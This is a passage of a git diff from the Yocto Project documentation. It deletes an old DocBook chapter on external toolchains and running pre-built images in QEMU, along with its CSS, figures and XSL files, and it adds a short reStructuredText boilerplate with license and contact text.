-            you need to be sure your image has the appropriate static
-            development libraries.
-            Use the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>
-            variable inside your <filename>local.conf</filename> file to
-            install the appropriate library packages.
-            Following is an example using <filename>glibc</filename> static
-            development libraries:
-            <literallayout class='monospaced'>
-     IMAGE_INSTALL_append = " glibc-staticdev"
-            </literallayout>
-        </note>
-    </para>
-</section>
-
-<section id='optionally-using-an-external-toolchain'>
-    <title>Optionally Using an External Toolchain</title>
-
-    <para>
-        You might want to use an external toolchain as part of your
-        development.
-        If this is the case, the fundamental steps you need to accomplish
-        are as follows:
-        <itemizedlist>
-            <listitem><para>
-                Understand where the installed toolchain resides.
-                For cases where you need to build the external toolchain, you
-                would need to take separate steps to build and install the
-                toolchain.
-                </para></listitem>
-            <listitem><para>
-                Make sure you add the layer that contains the toolchain to
-                your <filename>bblayers.conf</filename> file through the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
-                variable.
-                </para></listitem>
-            <listitem><para>
-                Set the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTERNAL_TOOLCHAIN'><filename>EXTERNAL_TOOLCHAIN</filename></ulink>
-                variable in your <filename>local.conf</filename> file
-                to the location in which you installed the toolchain.
-                </para></listitem>
-        </itemizedlist>
-        A good example of an external toolchain used with the Yocto Project
-        is <trademark class='registered'>Mentor Graphics</trademark>
-        Sourcery G++ Toolchain.
-        You can see information on how to use that particular layer in the
-        <filename>README</filename> file at
-        <ulink url='http://github.com/MentorEmbedded/meta-sourcery/'></ulink>.
-        You can find further information by reading about the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-TCMODE'><filename>TCMODE</filename></ulink>
-        variable in the Yocto Project Reference Manual's variable glossary.
-    </para>
-</section>
-
-    <section id='using-pre-built'>
-        <title>Example Using Pre-Built Binaries and QEMU</title>
-
-        <para>
-            If hardware, libraries and services are stable, you can get started by using a pre-built binary
-            of the filesystem image, kernel, and toolchain and run it using the QEMU emulator.
-            This scenario is useful for developing application software.
-        </para>
-
-        <mediaobject>
-            <imageobject>
-            <imagedata fileref="figures/using-a-pre-built-image.png" format="PNG" align='center' scalefit='1'/>
-            </imageobject>
-            <caption>
-                <para>Using a Pre-Built Image</para>
-            </caption>
-        </mediaobject>
-
-        <para>
-            For this scenario, you need to do several things:
-        </para>
-
-        <itemizedlist>
-            <listitem><para>Install the appropriate stand-alone toolchain tarball.</para></listitem>
-            <listitem><para>Download the pre-built image that will boot with QEMU.
-                You need to be sure to get the QEMU image that matches your target machine’s
-                architecture (e.g. x86, ARM, etc.).</para></listitem>
-            <listitem><para>Download the filesystem image for your target machine's architecture.
-                </para></listitem>
-            <listitem><para>Set up the environment to emulate the hardware and then start the QEMU emulator.
-                </para></listitem>
-        </itemizedlist>
-
-        <section id='installing-the-toolchain'>
-            <title>Installing the Toolchain</title>
-
-            <para>
-                You can download a tarball installer, which includes the
-                pre-built toolchain, the <filename>runqemu</filename>
-                script, and support files from the appropriate directory under
-                <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'></ulink>.
-                Toolchains are available for 32-bit and 64-bit x86 development
-                systems from the <filename>i686</filename> and
-                <filename>x86_64</filename> directories, respectively.
-                The toolchains the Yocto Project provides are based off the
-                <filename>core-image-sato</filename> image and contain
-                libraries appropriate for developing against that image.
-                Each type of development system supports five or more target
-                architectures.
-            </para>
-
-            <para>
-                The names of the tarball installer scripts are such that a
-                string representing the host system appears first in the
-                filename and then is immediately followed by a string
-                representing the target architecture.
-            </para>
-
-            <literallayout class='monospaced'>
-     poky-glibc-<replaceable>host_system</replaceable>-<replaceable>image_type</replaceable>-<replaceable>arch</replaceable>-toolchain-<replaceable>release_version</replaceable>.sh
-
-     Where:
-         <replaceable>host_system</replaceable> is a string representing your development system:
-
-                    i686 or x86_64.
-
-         <replaceable>image_type</replaceable> is a string representing the image you wish to
-                develop a Software Development Toolkit (SDK) for use against.
-                The Yocto Project builds toolchain installers using the
-                following BitBake command:
-
-                    bitbake core-image-sato -c populate_sdk
-
-         <replaceable>arch</replaceable> is a string representing the tuned target architecture:
-
-                    i586, x86_64, powerpc, mips, armv7a or armv5te
-
-         <replaceable>release_version</replaceable> is a string representing the release number of the
-                Yocto Project:
-
-                    &DISTRO;, &DISTRO;+snapshot
-            </literallayout>
-
-            <para>
-                For example, the following toolchain installer is for a 64-bit
-                development host system and a i586-tuned target architecture
-                based off the SDK for <filename>core-image-sato</filename>:
-                <literallayout class='monospaced'>
-     poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
-                </literallayout>
-            </para>
-
-            <para>
-                Toolchains are self-contained and by default are installed into
-                <filename>/opt/poky</filename>.
-                However, when you run the toolchain installer, you can choose an
-                installation directory.
-            </para>
-
-            <para>
-                The following command shows how to run the installer given a toolchain tarball
-                for a 64-bit x86 development host system and a 32-bit x86 target architecture.
-                You must change the permissions on the toolchain
-                installer script so that it is executable.
-            </para>
-
-            <para>
-                The example assumes the toolchain installer is located in <filename>~/Downloads/</filename>.
-                <note>
-                    If you do not have write permissions for the directory into which you are installing
-                    the toolchain, the toolchain installer notifies you and exits.
-                    Be sure you have write permissions in the directory and run the installer again.
-                </note>
-            </para>
-
-            <para>
-                <literallayout class='monospaced'>
-     $ ~/Downloads/poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
-                </literallayout>
-            </para>
-
-            <para>
-                For more information on how to install tarballs, see the
-                "<ulink url='&YOCTO_DOCS_ADT_URL;#using-an-existing-toolchain-tarball'>Using a Cross-Toolchain Tarball</ulink>" and
-                "<ulink url='&YOCTO_DOCS_ADT_URL;#using-the-toolchain-from-within-the-build-tree'>Using BitBake and the Build Directory</ulink>" sections in the Yocto Project Application Developer's Guide.
-            </para>
-        </section>
-
-        <section id='downloading-the-pre-built-linux-kernel'>
-            <title>Downloading the Pre-Built Linux Kernel</title>
-
-            <para>
-                You can download the pre-built Linux kernel suitable for running in the QEMU emulator from
-                <ulink url='&YOCTO_QEMU_DL_URL;'></ulink>.
-                Be sure to use the kernel that matches the architecture you want to simulate.
-                Download areas exist for the five supported machine architectures:
-                <filename>qemuarm</filename>, <filename>qemumips</filename>, <filename>qemuppc</filename>,
-                <filename>qemux86</filename>, and <filename>qemux86-64</filename>.
-            </para>
-
-            <para>
-                Most kernel files have one of the following forms:
-                <literallayout class='monospaced'>
-     *zImage-qemu<replaceable>arch</replaceable>.bin
-     vmlinux-qemu<replaceable>arch</replaceable>.bin
-
-     Where:
-         <replaceable>arch</replaceable> is a string representing the target architecture:
-                x86, x86-64, ppc, mips, or arm.
-                </literallayout>
-            </para>
-
-            <para>
-                You can learn more about downloading a Yocto Project kernel in the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#local-kernel-files'>Yocto Project Kernel</ulink>"
-                bulleted item in the Yocto Project Development Manual.
-            </para>
-        </section>
-
-        <section id='downloading-the-filesystem'>
-            <title>Downloading the Filesystem</title>
-
-            <para>
-                You can also download the filesystem image suitable for your target architecture from
-                <ulink url='&YOCTO_QEMU_DL_URL;'></ulink>.
-                Again, be sure to use the filesystem that matches the architecture you want
-                to simulate.
-            </para>
-
-            <para>
-                The filesystem image has two tarball forms: <filename>ext3</filename> and
-                <filename>tar</filename>.
-                You must use the <filename>ext3</filename> form when booting an image using the
-                QEMU emulator.
-                The <filename>tar</filename> form can be flattened out in your host development system
-                and used for build purposes with the Yocto Project.
-                <literallayout class='monospaced'>
-     core-image-<replaceable>profile</replaceable>-qemu<replaceable>arch</replaceable>.ext3
-     core-image-<replaceable>profile</replaceable>-qemu<replaceable>arch</replaceable>.tar.bz2
-
-     Where:
-         <replaceable>profile</replaceable> is the filesystem image's profile:
-                   lsb, lsb-dev, lsb-sdk, lsb-qt3, minimal, minimal-dev, sato,
-                   sato-dev, or sato-sdk. For information on these types of image
-                   profiles, see the "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
-                   chapter in the Yocto Project Reference Manual.
-
-         <replaceable>arch</replaceable> is a string representing the target architecture:
-                x86, x86-64, ppc, mips, or arm.
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='setting-up-the-environment-and-starting-the-qemu-emulator'>
-            <title>Setting Up the Environment and Starting the QEMU Emulator</title>
-
-            <para>
-                Before you start the QEMU emulator, you need to set up the emulation environment.
-                The following command form sets up the emulation environment.
-                <literallayout class='monospaced'>
-     $ source &YOCTO_ADTPATH_DIR;/environment-setup-<replaceable>arch</replaceable>-poky-linux-<replaceable>if</replaceable>
-
-     Where:
-         <replaceable>arch</replaceable> is a string representing the target architecture:
-                i586, x86_64, ppc603e, mips, or armv5te.
-
-         <replaceable>if</replaceable> is a string representing an embedded application binary interface.
-              Not all setup scripts include this string.
-                </literallayout>
-            </para>
-
-            <para>
-                Finally, this command form invokes the QEMU emulator
-                <literallayout class='monospaced'>
-     $ runqemu <replaceable>qemuarch</replaceable> <replaceable>kernel-image</replaceable> <replaceable>filesystem-image</replaceable>
-
-     Where:
-         <replaceable>qemuarch</replaceable> is a string representing the target architecture: qemux86, qemux86-64,
-                    qemuppc, qemumips, or qemuarm.
-
-         <replaceable>kernel-image</replaceable> is the architecture-specific kernel image.
-
-         <replaceable>filesystem-image</replaceable> is the .ext3 filesystem image.
-
-                </literallayout>
-            </para>
-
-            <para>
-                Continuing with the example, the following two commands setup the emulation
-                environment and launch QEMU.
-                This example assumes the root filesystem (<filename>.ext3</filename> file) and
-                the pre-built kernel image file both reside in your home directory.
-                The kernel and filesystem are for a 32-bit target architecture.
-                <literallayout class='monospaced'>
-     $ cd $HOME
-     $ source &YOCTO_ADTPATH_DIR;/environment-setup-i586-poky-linux
-     $ runqemu qemux86 bzImage-qemux86.bin \
-     core-image-sato-qemux86.ext3
-                </literallayout>
-            </para>
-
-            <para>
-                The environment in which QEMU launches varies depending on the filesystem image and on the
-                target architecture.
-                For example, if you source the environment for the ARM target
-                architecture and then boot the minimal QEMU image, the emulator comes up in a new
-                shell in command-line mode.
-                However, if you boot the SDK image, QEMU comes up with a GUI.
-                <note>Booting the PPC image results in QEMU launching in the same shell in
-                command-line mode.</note>
-            </para>
-        </section>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-style.css b/documentation/adt-manual/adt-style.css
deleted file mode 100644
index d722ad4b7f..0000000000
--- a/documentation/adt-manual/adt-style.css
+++ /dev/null
@@ -1,984 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/adt-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/adt-manual/figures/adt-title.png b/documentation/adt-manual/figures/adt-title.png
deleted file mode 100644
index 6e71e41f1a..0000000000
--- a/documentation/adt-manual/figures/adt-title.png
+++ /dev/null
diff --git a/documentation/adt-manual/figures/using-a-pre-built-image.png b/documentation/adt-manual/figures/using-a-pre-built-image.png
deleted file mode 100644
index b03130d123..0000000000
--- a/documentation/adt-manual/figures/using-a-pre-built-image.png
+++ /dev/null
diff --git a/documentation/boilerplate.rst b/documentation/boilerplate.rst
new file mode 100644
index 0000000000..ddffdac242
--- /dev/null
+++ b/documentation/boilerplate.rst
@@ -0,0 +1,18 @@
+.. include:: <xhtml1-lat1.txt>
+.. include:: <xhtml1-symbol.txt>
+
+----
+
+| |project_name|
+| <docs@lists.yoctoproject.org>
+
+Permission is granted to copy, distribute and/or modify this document under the
+terms of the `Creative Commons Attribution-Share Alike 2.0 UK: England & Wales
+<http://creativecommons.org/licenses/by-sa/2.0/uk/>`_ as published by Creative
+Commons.
+
+To report any inaccuracies or problems with this (or any other Yocto Project)
+manual, or to send additions or changes, please send email/patches to the Yocto
+Project documentation mailing list at ``docs@lists.yoctoproject.org`` or
+log into the freenode ``#yocto`` channel.
+
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-customization.xsl b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-customization.xsl
deleted file mode 100644
index 0d57424b59..0000000000
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-customization.xsl
+++ /dev/null
@@ -1,24 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:import href="brief-yoctoprojectqs-titlepage.xsl"/>
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-
-  <xsl:param name="generate.toc" select="'article nop'"></xsl:param>
-  <xsl:param name="html.stylesheet" select="'brief-yoctoprojectqs-style.css'" />
-</xsl:stylesheet>
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-style.css b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-style.css
deleted file mode 100644
index 386841debe..0000000000
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-style.css
+++ /dev/null
@@ -1,989 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
